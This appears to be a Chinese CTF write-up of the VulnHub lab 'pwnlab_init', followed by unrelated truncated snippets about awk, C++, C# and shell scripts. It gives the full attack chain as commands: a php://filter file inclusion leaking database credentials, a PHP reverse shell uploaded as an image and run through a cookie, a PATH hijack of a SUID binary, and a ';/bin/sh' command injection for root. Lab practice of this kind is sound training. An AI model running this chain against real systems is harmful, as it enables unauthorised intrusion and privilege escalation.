pwnlab_init靶场记录

news/2024/5/19 22:48:06 标签: web安全, 网络安全, CTF

一、环境说明

目标:得到root权限&找到flag.txt

靶场下载地址:https://www.vulnhub.com/entry/pwnlab-init,158/

靶机IP:192.168.252.134

KaliIP:192.168.252.132

二、练习记录

扫描端口。

nmap -p 1-65535 -T4 -sT 192.168.252.134
image-20230203142330799

扫描漏洞

nikto -h http://192.168.252.134
image-20230203142528250

发现敏感文件,login.php,config.php,浏览器访问发现page=login,可能存在文件包含login.php。

image-20230203142811144

尝试包含config.php文件。

http://192.168.252.134/?page=php://filter/read=convert.base64-encode/resource=config
image-20230203143355034

获取账户密码,尝试登录MYSQL数据库,获取用户账户密码,使用kent/JWzXuBJJNy成功登录web系统,发现文件上传功能。

mysql -uroot -pH4u%QJ_H99 -h 192.168.252.134 
image-20230203143556444

包含upload.php,index.php两个文件,获取源码,可以看到**$_COOKIE[‘lang’]处可以通过lang参数传值包含非.php后缀的文件**,而login.php采用白名单限制,无法直接上传php文件,需要通过文件包含进行解析执行。

image-20230203144115022

使用kali自带的php反弹shell:/usr/share/webshells/php/php-reverse-shell.php,注意修改反连IP以及端口号。

└─# locate php-rever                                                         
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

监听端口后发送请求包,包含上传的webshell,获取reverse shell。

nc -lvvp 1234
curl http://192.168.252.134 -H 'cookie:lang=../upload/364be8860e8d72b4358b5e88099a935a.png'
image-20230203144919448 image-20230203145021995

获取稳定pty终端,使用登录kane账户。

python -c 'import pty;pty.spawn("/bin/bash")'
image-20230203150059622

查找具有SUID权限的文件,发现msgmike文件,查看其文件内容,发现存在cat /home/mike/msg.txt命令执行,即其权限可能为mike用户权限,如果修改cat命令,则以kane用户权限运行的msgmike文件将调用cat,并且这个cat将以mike用户权限运行,实现提权至mike用户。

find / -perm -4000 2>/dev/null

image-20230203150746440image-20230203151012240

# 修改cat
kane@pwnlab:~$ echo "/bin/bash" > cat
# 赋予执行权限
kane@pwnlab:~$ chmod +x cat
# 修改环境变量,以达到调用本地修改后的cat命令
kane@pwnlab:~$ export PATH=/home/kane
# 还原环境变量
kane@pwnlab:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

执行后可以看到成功切换到了mike权限用户,此时需要重新把环境变量还原。

image-20230203153227587
# 切换到mike用户目录,发现msg2root文件
mike@pwnlab:~$ cd /home/mike/
# 查看文件发现存在echo命令执行
mike@pwnlab:/home/mike$ cat msg2root
# 通过分号拼接命令执行/bin/bash 获取root用户权限
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: test;/bin/sh
image-20230203154329636 image-20230203154406591

http://www.niftyadmin.cn/n/1780036.html

相关文章

awk题目3

1.http://bbs.chinaunix.net/thread-4157887-1-1.htmlcat file:>a11>a111>a1111>a22>a222>b13>b133将各个title 下边的合在一起 输出如下:>a1111111>a2222>b1333awk /^>/&&!a[$1]||!/^>/(可以改写成 awk />/{if(!a[…

HDU 2016

#include <iostream>using namespace std;int main(){int m[100],n,i,min,k;while (cin>>n) {if(n 0) break; /*结束循环的条件*/for (i 0; i < n ; i) {cin>>m[i]; /*输入该组数据*/if (i 0) {min m[i]; /*初始化最小值*/k i;}if(m[i] < min) {m…

渗透测试懒人工具P2note

声明 此工具仅作学习交流用&#xff0c;不要做任何违法行为&#xff0c;出现一切问题概不负责。 渗透测试懒人工具声明一、简介二、自定义内容三、最后一、简介 P2note(Penetration-test payload note) 是基于layui 框架设计的一款渗透测试懒人工具&#xff0c;本意为减少渗透…

C# 类库使用嵌入资源

1.将资源文件的属性改成“嵌入资源” 2. 1 string assembleName this.GetType().Assembly.GetName().Name;//本程序集名 2 Stream stream Assembly.GetExecutingAssembly().GetManifestResourceStream(string.Format("{0}.{1}", assembleName, xmlP…

pycharm Working directory error

/****************************************************************************** pycharm Working directory error* 说明&#xff1a;* 今天在使用pycharm进行autoGenSystem工具软件时总是得不到正确的目录&#xff0c;最后* 通过获取当前路径&#…

UNIX常见命令索引(rev,paste,join,tr,bc,readelf,strings,xxd)

rev rev file 对读入的每一行&#xff0c;输出其倒序后的结果 paste paste [options] files 将files中的文件每个各自获取一行&#xff0c;并用tab&#xff08;默认&#xff09;将它们连接起来合成新的一行。 -d LIST 不使用默认的tab&#xff0c;而是用LIST中的字符来逐个连接…

IOS应用上传须要做的工作

苹果开发人员 https://developer.apple.com/ 证书创建流程 certificates (证书):是电脑可以增加开发人员计划的凭证证书分为:开发证书和公布(产品)证书,开发证书仅仅能做真机測试,公布证书仅仅能做产品公布identifiers (标识符):应用的唯一标识符(App ID)App ID相应Xcode中Bo…

PHP源码编译安装管理常用脚本

#!/bin/sh # 编译安装管理PHP Appphp AppNamePHP AppBase/App AppDir$AppBase/$App AppProg$AppDir/sbin/php-fpm AppIni$AppDir/etc/php.ini AppConf$AppDir/etc/php-fpm.conf ExtensionDir$($AppDir/bin/php-config --extension-dir)AppSrcBase/App/src AppSrcFile$App-*.tar…